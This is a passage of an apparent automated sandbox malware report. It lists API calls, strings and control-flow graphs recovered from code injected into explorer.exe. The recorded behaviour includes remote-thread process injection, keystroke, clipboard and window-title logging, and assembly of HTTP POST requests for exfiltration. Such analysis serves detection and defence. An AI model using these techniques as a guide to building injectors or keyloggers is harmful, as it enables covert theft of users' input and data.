                                  • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                  • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                  • API String ID: 3018447944-2805246637
                                  • Opcode ID: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                  • Instruction ID: a52374c8d3c32c87d7b7eec75c6ac1f607deb3f7449bc71aaab08c49aa80d9b3
                                  • Opcode Fuzzy Hash: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                  • Instruction Fuzzy Hash: 6F41A1302047019BD714BF649C959BE77EDFF84B50F000628B9D6972E2EF389E068B62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 122 89ae0-89ae5 123 89aeb-89af8 122->123 124 89cad 122->124 125 89b0a-89b0f 123->125 124->124 126 89b11 125->126 127 89b00-89b05 126->127 128 89b13 126->128 130 89b06-89b08 127->130 129 89b18-89b1a 128->129 131 89b1c-89b21 129->131 132 89b23-89b27 129->132 130->125 130->126 131->132 132->129 133 89b29 132->133 134 89b2b-89b32 133->134 135 89b34-89b39 133->135 134->129 134->135 136 89b48-89b4a 135->136 137 89b3b-89b44 135->137 140 89b4c-89b51 136->140 141 89b53-89b57 136->141 138 89bba-89bbd 137->138 139 89b46 137->139 142 89bc2-89bc5 138->142 139->136 140->141 143 89b59-89b5e 141->143 144 89b60-89b62 141->144 147 89bc7-89bc9 142->147 143->144 145 89b84-89b93 144->145 146 89b64 144->146 149 89ba4-89bb1 145->149 150 89b95-89b9c 145->150 148 89b65-89b67 146->148 147->142 151 89bcb-89bce 147->151 153 89b69-89b6e 148->153 154 89b70-89b74 148->154 149->149 156 89bb3-89bb5 149->156 150->150 155 89b9e 150->155 151->142 152 89bd0-89bec 151->152 152->147 157 89bee 152->157 153->154 154->148 158 89b76 154->158 155->130 156->130 159 89bf4-89bf8 157->159 160 89b78-89b7f 158->160 161 89b81 158->161 162 89bfa-89c10 LoadLibraryA 159->162 163 89c3f-89c42 159->163 160->148 160->161 161->145 164 89c11-89c16 162->164 165 89c45-89c4c 163->165 164->159 166 89c18-89c1a 164->166 167 89c4e-89c50 165->167 168 89c70-89ca0 VirtualProtect * 2 165->168 170 89c1c-89c22 166->170 171 89c23-89c30 GetProcAddress 166->171 172 89c52-89c61 167->172 173 89c63-89c6e 167->173 169 89ca4-89ca8 168->169 169->169 174 89caa 169->174 170->171 175 89c39-89c3c 171->175 176 89c32-89c37 171->176 172->165 173->172 174->124 176->164
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_88000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                  • Instruction ID: 0d37eedbe500ee790c8412a6b65a8675b6b3dcc5f5d5e4945e36827d966a7865
                                  • Opcode Fuzzy Hash: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                  • Instruction Fuzzy Hash: 495124B1A446524AD721BA78DD807B5BBE4FB52334B2C0739C5E6CB3C6E7A45806C7A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 177 8276d-8277f OpenFileMappingA 178 82781-82791 MapViewOfFile 177->178 179 82794-82798 177->179 178->179
                                  APIs
                                  • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$MappingOpenView
                                  • String ID:
                                  • API String ID: 3439327939-0
                                  • Opcode ID: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                  • Instruction ID: b6b55214a3d7b72dd5065cc7f6cf5cc5cfe51089837142714a1d2e3023f5fcf5
                                  • Opcode Fuzzy Hash: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                  • Instruction Fuzzy Hash: 23D01732715231BBE3745A7B6C0CF83AEDDEFC6AE1B010025B94DD2190D6648810C7F0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 180 82a09-82a19 GetProcessHeap RtlAllocateHeap
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                  • Instruction ID: 854f13ea7621927148a9a8b2bf7c264aaceb780fcb2716b8a169ac4b90289c09
                                  • Opcode Fuzzy Hash: 6f12a9a4d3fd0b48daed3c74c3a73a850d67d067b2b8cc6d9cc29207745153cb
                                  • Instruction Fuzzy Hash: 0CA002B16501006BFD4457E4DD1DF157658B7C4F01F4045447286C50509D7955449F21

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 181 829bd-829cd VirtualAlloc
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 041fb65ac21d29ab37e841364fd4ad3748544a2b72ce38b46e1defc18cfa756a
                                  • Instruction ID: 8bd9330f3be4a518e142edf8833f351408f8424ca9791493f3865f30ac4231aa
                                  • Opcode Fuzzy Hash: 041fb65ac21d29ab37e841364fd4ad3748544a2b72ce38b46e1defc18cfa756a
                                  • Instruction Fuzzy Hash: 6EA002B07D5300BAFD6997519D2FF152A18A780F02F104144B34A7C1D056E8B6008E3E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 182 829ae-829bc VirtualFree
                                  APIs
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,000813A4), ref: 000829B6
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: fd4e0138bbc4a629f0972929a51a7b20381c35c8c5cd08bfa3ce00556871b997
                                  • Instruction ID: ecddb0b477d60b3ab68b8a06888dc397c8b4e5f793bd5d8ee8f1450ff0cd2e54
                                  • Opcode Fuzzy Hash: fd4e0138bbc4a629f0972929a51a7b20381c35c8c5cd08bfa3ce00556871b997
                                  • Instruction Fuzzy Hash: 58A0027079070076FD7457609D1AF0566547780F02F2046447285A80D049A9A1489F18

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000818F4
                                  • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0008192F
                                  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000819BF
                                  • RtlMoveMemory.NTDLL(00000000,00083638,00000016), ref: 000819E6
                                  • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081A0E
                                  • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081A1E
                                  • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081A38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00081A40
                                  • CloseHandle.KERNEL32(00000000), ref: 00081A4E
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A55
                                  • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00081A6B
                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A72
                                  • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A88
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AB2
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081AC5
                                  • CloseHandle.KERNEL32(00000000), ref: 00081ACC
                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081AD3
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081AE7
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081AFE
                                  • CloseHandle.KERNEL32(00000000), ref: 00081B0B
                                  • CloseHandle.KERNEL32(?), ref: 00081B11
                                  • CloseHandle.KERNEL32(?), ref: 00081B17
                                  • CloseHandle.KERNEL32(00000000), ref: 00081B1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                  • String ID: atan$ntdll$opera_shared_counter
                                  • API String ID: 1066286714-2737717697
                                  • Opcode ID: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                  • Instruction ID: 174d13c8333c33db2c366c6690c673af472261b50b6cc6d7832f0528390f2b82
                                  • Opcode Fuzzy Hash: 36e689c70820efb820419eec2dab6d64e40f633ab622aee628fcb010377c2343
                                  • Instruction Fuzzy Hash: D6614B71204205AFE710EF65DC94EABBBECFF88B54F000519F98997291DB74DE058BA2

                                  Control-flow Graph

                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000827B5
                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000827CD
                                  • lstrlen.KERNEL32(?,00000000), ref: 000827D5
                                  • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000827E0
                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000827FA
                                  • wsprintfA.USER32 ref: 00082811
                                  • CryptDestroyHash.ADVAPI32(?), ref: 0008282A
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00082834
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                  • String ID: %02X
                                  • API String ID: 3341110664-436463671
                                  • Opcode ID: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                  • Instruction ID: 7af9abcfa44f8fdb20a1014f3b0a0b848b8d4329f526ecb6ba9fbd9c9bd4efaa
                                  • Opcode Fuzzy Hash: fafac3b923be732a0fc419871dc0777a5965ddf3f11d93127bce2daa8561b749
                                  • Instruction Fuzzy Hash: A3112B71900108BFEB119B95EC98EEEBFBCFB88B11F104065FA45E2150DA754F459B60
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00081652
                                  • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0008167A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: KeyboardStateUnicode
                                  • String ID:
                                  • API String ID: 3453085656-3916222277
                                  • Opcode ID: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                  • Instruction ID: 29f38b6ab814598dd83ed5aba00077f139db2babf61fac0e1786dbac03cf2fdc
                                  • Opcode Fuzzy Hash: 1047935c90087d710069a2d22a99efe4102876523e6bfe61ddc0ba0b841e58bd
                                  • Instruction Fuzzy Hash: 1B0184329006299BEB34EB54DD45BFB73FCBF45B10F08441AE9C1E2151E734D9568BA1

                                  Control-flow Graph

                                  APIs
                                  • RtlZeroMemory.NTDLL(00085013,0000001C), ref: 000813C8
                                  • VirtualQuery.KERNEL32(000813AE,?,0000001C), ref: 000813DA
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0008140B
                                  • GetCurrentProcessId.KERNEL32(00000004), ref: 0008141C
                                  • wsprintfA.USER32 ref: 00081433
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081448
                                  • GetLastError.KERNEL32 ref: 0008144E
                                  • RtlInitializeCriticalSection.NTDLL(0008582C), ref: 00081465
                                  • Sleep.KERNEL32(000001F4), ref: 00081489
                                  • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000814A6
                                  • GetProcAddress.KERNEL32(00000000), ref: 000814AF
                                  • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000814D0
                                  • GetProcAddress.KERNEL32(00000000), ref: 000814D3
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000814F1
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0008150D
                                  • CloseHandle.KERNEL32(00000000), ref: 00081514
                                  • RtlExitUserThread.NTDLL(00000000), ref: 0008152A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                  • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                  • API String ID: 3628807430-1779906909
                                  • Opcode ID: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                  • Instruction ID: 735b7a70de4e956d7122513613398751e416d658d32f83b3185d311b43a817db
                                  • Opcode Fuzzy Hash: 0d1da8dc0e211480dc30328cac78b55f9fbc3807973028df58c33a94b06f89d9
                                  • Instruction Fuzzy Hash: 7E41B570640B04EBE710BF65EC19E9F3FACFF84B51B004029F6C59A292DB7999018FA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 256 816b9-816cc RtlEnterCriticalSection 257 817ce-817db RtlLeaveCriticalSection 256->257 258 816d2-816e7 lstrlenW 256->258 259 817cc-817cd 258->259 260 816ed-81700 lstrlenW 258->260 259->257 261 8171e-81721 260->261 262 81702-81719 call 829ce 260->262 264 8174e-81758 GetForegroundWindow 261->264 265 81723-81724 261->265 262->261 264->259 268 8175a-8176f GetWindowTextW 264->268 265->259 267 8172a-8174c call 817dc wsprintfW 265->267 276 817b6-817bd call 829eb 267->276 269 8177a-81789 lstrcmpW 268->269 270 81771-81774 GetClassNameW 268->270 272 8178b-817b3 lstrcpyW call 817dc wsprintfW 269->272 273 817bf-817c6 lstrcatW 269->273 270->269 272->276 273->259 276->259
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(0008582C), ref: 000816C4
                                  • lstrlenW.KERNEL32 ref: 000816DB
                                  • lstrlenW.KERNEL32 ref: 000816F3
                                  • wsprintfW.USER32 ref: 00081743
                                  • GetForegroundWindow.USER32 ref: 0008174E
                                  • GetWindowTextW.USER32(00000000,00085850,00000800), ref: 00081767
                                  • GetClassNameW.USER32(00000000,00085850,00000800), ref: 00081774
                                  • lstrcmpW.KERNEL32(00085020,00085850), ref: 00081781
                                  • lstrcpyW.KERNEL32(00085020,00085850), ref: 0008178D
                                  • wsprintfW.USER32 ref: 000817AD
                                  • lstrcatW.KERNEL32 ref: 000817C6
                                  • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000817D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                  • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                  • API String ID: 2651329914-3371406555
                                  • Opcode ID: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                  • Instruction ID: e106a69ff408d8b0d66b3fc31dadf507e352e016c891a9268a5da8e7baf2df89
                                  • Opcode Fuzzy Hash: 757df017c9863c0e0ed70b929079f800b9485ac0c02a4dc8e298e1e1eff6aa01
                                  • Instruction Fuzzy Hash: CE21B734544A14ABE7217B25FC89EAF3EBCFF81F56B144028F5C196162DE198D028BF5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 825f1-8262f GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 286 8267d-8267f 285->286 287 82631-82635 286->287 288 82681-8268e CloseHandle 286->288 289 82671-82677 Thread32Next 287->289 290 82637-8263b 287->290 289->286 290->289 291 8263d-82656 OpenThread 290->291 292 82658-8265e SuspendThread 291->292 293 82660 ResumeThread 291->293 294 82666-8266d CloseHandle 292->294 293->294 294->289
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 00082603
                                  • GetCurrentThreadId.KERNEL32 ref: 0008260B
                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0008261B
                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 00082629
                                  • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00082648
                                  • SuspendThread.KERNEL32(00000000), ref: 00082658
                                  • CloseHandle.KERNEL32(00000000), ref: 00082667
                                  • Thread32Next.KERNEL32(00000000,0000001C), ref: 00082677
                                  • CloseHandle.KERNEL32(00000000), ref: 00082682
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                  • String ID:
                                  • API String ID: 1467098526-0
                                  • Opcode ID: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                  • Instruction ID: b03dfa3635f73c53ef02778bef4dd97478a1a04b34a9c8620f52957b2d5eb463
                                  • Opcode Fuzzy Hash: 6c153cda338048d470b88c78b472e7e2587ded5770a804ff46caec27f8830615
                                  • Instruction Fuzzy Hash: 5D117C31404200EFE711AF60AC5CB6EBEA4FF84B05F000529FAC692150E7388A199FA3

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 295 820a1-820fc call 8240f call 82a09 call 8298a call 824cc 304 820fe-82115 295->304 305 82117-82123 295->305 308 82127-82129 304->308 305->308 309 823fd-8240c call 829eb 308->309 310 8212f-82166 RtlZeroMemory 308->310 314 8216c-82187 310->314 315 823f5-823fc 310->315 316 821b9-821cb 314->316 317 82189-8219a call 8243d 314->317 315->309 322 821cf-821d1 316->322 323 8219c-821ab 317->323 324 821ad 317->324 326 823e2-823e8 322->326 327 821d7-82233 call 8288d 322->327 325 821af-821b7 323->325 324->325 325->322 328 823ea-823ec call 829eb 326->328 329 823f1 326->329 335 82239-8223e 327->335 336 823db 327->336 328->329 329->315 337 82258-82286 call 82a09 wsprintfW 335->337 338 82240-82251 335->338 336->326 341 82288-8228a 337->341 342 8229f-822b6 337->342 338->337 343 8228b-8228e 341->343 348 822b8-822ee call 82a09 wsprintfW 342->348 349 822f5-8230f 342->349 344 82299-8229b 343->344 345 82290-82295 343->345 344->342 345->343 347 82297 345->347 347->342 348->349 353 823b8-823ce call 829eb 349->353 354 82315-82328 349->354 362 823d0-823d2 call 829eb 353->362 363 823d7 353->363 354->353 357 8232e-82344 call 82a09 354->357 364 82346-82351 357->364 362->363 363->336 366 82353-82360 call 829ce 364->366 367 82365-8237c 364->367 366->367 371 8237e 367->371 372 82380-8238d 367->372 371->372 372->364 373 8238f-82393 372->373 374 823ad-823b4 call 829eb 373->374 375 82395-823a7 call 829bd RtlMoveMemory 373->375 374->353 375->374
                                  APIs
                                    • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                    • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                    • Part of subcall function 0008298A: lstrlen.KERNEL32(00084FE2,?,00000000,00000000,000820DD,75712B62,00084FE2,00000000), ref: 00082992
                                    • Part of subcall function 0008298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00084FE2,00000001,00000000,00000000), ref: 000829A4
                                    • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 00082139
                                  • wsprintfW.USER32 ref: 00082272
                                  • wsprintfW.USER32 ref: 000822DD
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                  • API String ID: 4204651544-1701262698
                                  • Opcode ID: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                  • Instruction ID: eb393b0eeacd80a5bfa002af34c47191fe6bec282c1bd132379949c4154c94d3
                                  • Opcode Fuzzy Hash: 5a75ec7aaa5246b68fcf205f19a0b393a975a851f35745c89a23fa9bc14736c6
                                  • Instruction Fuzzy Hash: A7A13A71608345AFD750AF68D888A6BBBE9FFC8B40F14082DF5C5D7252DA78DA048B52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 380 812ae-812bf 381 812c5-812c7 380->381 382 813a6-813ad 380->382 381->382 383 812cd-812fc call 829bd lstrlen call 82a09 381->383 388 8136e-81377 call 829eb 383->388 389 812fe-81327 call 82841 RtlZeroMemory 383->389 394 81379-8137d 388->394 395 8139d-813a5 call 829ae 388->395 396 81329-8134f RtlMoveMemory call 82569 389->396 397 81353-81369 RtlMoveMemory call 82569 389->397 398 8137f-81392 call 8255c PathMatchSpecA 394->398 395->382 396->389 406 81351 396->406 397->388 407 8139b 398->407 408 81394-81397 398->408 406->388 407->395 408->398 409 81399 408->409 409->395
                                  APIs
                                    • Part of subcall function 000829BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000812D9,00000000,00000000,?,00000001), ref: 000829C7
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000812DC
                                    • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                    • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0008138A
                                    • Part of subcall function 00082841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00081119,00000001), ref: 00082850
                                    • Part of subcall function 00082841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00081119,00000001), ref: 00082855
                                  • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00081316
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081332
                                    • Part of subcall function 00082569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0008136E), ref: 00082591
                                    • Part of subcall function 00082569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0008259A
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008135F
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                  • String ID:
                                  • API String ID: 2993730741-0
                                  • Opcode ID: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                  • Instruction ID: d5e7a5d4c6fba1c9ca2a6b0442937c699363d6c36e7367382e75030dee9f6b60
                                  • Opcode Fuzzy Hash: ebb8da3659380d077a57e1a160ee277981f50641c95accdbe0d8b302bb1cad2b
                                  • Instruction Fuzzy Hash: 5E219C707042129F8714FF2898558BEB7DEBF84B10B10092EF8D2D3242DB74DE0A8B62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 410 81581-81592 412 81598-8159b 410->412 413 81624-81628 410->413 414 8159d-815a0 412->414 415 815a7-815b3 GlobalFix 412->415 414->415 416 815a2-815a5 414->416 417 81623 415->417 418 815b5-815b9 415->418 416->413 416->415 417->413 419 815e9 418->419 420 815bb-815be 418->420 421 815eb-815f2 call 8293e 419->421 422 815c0-815c3 420->422 423 815e4-815e7 420->423 425 815f4-815fd call 82724 421->425 422->425 426 815c5-815e2 lstrlenW call 82a09 lstrcatW 422->426 423->421 432 8161b-81622 GlobalUnWire 425->432 433 815ff-81608 lstrlenW 425->433 426->425 432->417 433->432 434 8160a-8160e 433->434 435 8160f call 816b9 434->435 436 81614-81616 call 829eb 435->436 436->432
                                  APIs
                                  • GlobalFix.KERNEL32(00000000), ref: 000815A9
                                  • lstrlenW.KERNEL32(00000000), ref: 000815C6
                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 000815DC
                                  • lstrlenW.KERNEL32(00000000), ref: 00081600
                                  • GlobalUnWire.KERNEL32(00000000), ref: 0008161C
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Globallstrlen$Wirelstrcat
                                  • String ID:
                                  • API String ID: 2993198917-0
                                  • Opcode ID: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                  • Instruction ID: 788b0c73e6fd266604e91dee9fcfd0ea141b5d47a36d9ac5700182ba7bd2db02
                                  • Opcode Fuzzy Hash: 5f6c21cff03faee5907282101b8d15d9eae0dc33675b0a2edceb466badea6a51
                                  • Instruction Fuzzy Hash: D5010432A005119B96A577B9ACA85FE72EEFFC6B117080125F8C7E3212EE388D034750
                                  APIs
                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 00081BF4
                                  • LoadLibraryA.KERNEL32(?), ref: 00081C1C
                                  • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081C49
                                  • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081C9A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
